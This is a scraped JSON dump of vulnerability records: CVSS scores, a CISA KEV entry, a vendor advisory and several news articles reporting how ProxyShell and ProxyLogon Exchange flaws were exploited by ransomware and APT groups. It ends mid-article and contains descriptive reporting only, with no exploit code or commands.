T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-34473", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-10-04T10:05:38", "description": "A remote code execution vulnerability exists in Microsoft Exchange. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-34473; CVE-2021-34523)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-09-30T00:00:00", "id": "CPAI-2021-0476", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:27", "description": "[![Hive Ransomware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e1000/hive-ransomware.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[![Hive Ransomware](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e1000/hive.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW)](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to a collection of flaws in Microsoft Exchange Servers that could enable a threat actor to elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of the vulnerable machines. While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were patched in a series of updates released in May and July.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu)](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three of the Exchange servers that were compromised in different intrusions, using the access to hijack legitimate email threads and send malicious spam messages as replies, thereby increasing the likelihood that unsuspecting recipients will open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail getaways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding the attackers behind the operation did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[![ProxyShell Flaws](https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna)](<https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of \"**ProxyShell**\" Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n[![ProxyShell Flaws](https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf)](<https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf>) \n--- \nImage Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) \n \nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two remote code execution flaws that could be employed to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed as deployed to vulnerable Microsoft Exchange servers, with over over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchanger servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[![APT Hacking Group](https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso>)\n\nA previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleellonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\n[![Microsoft](https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc>)\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW)](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday 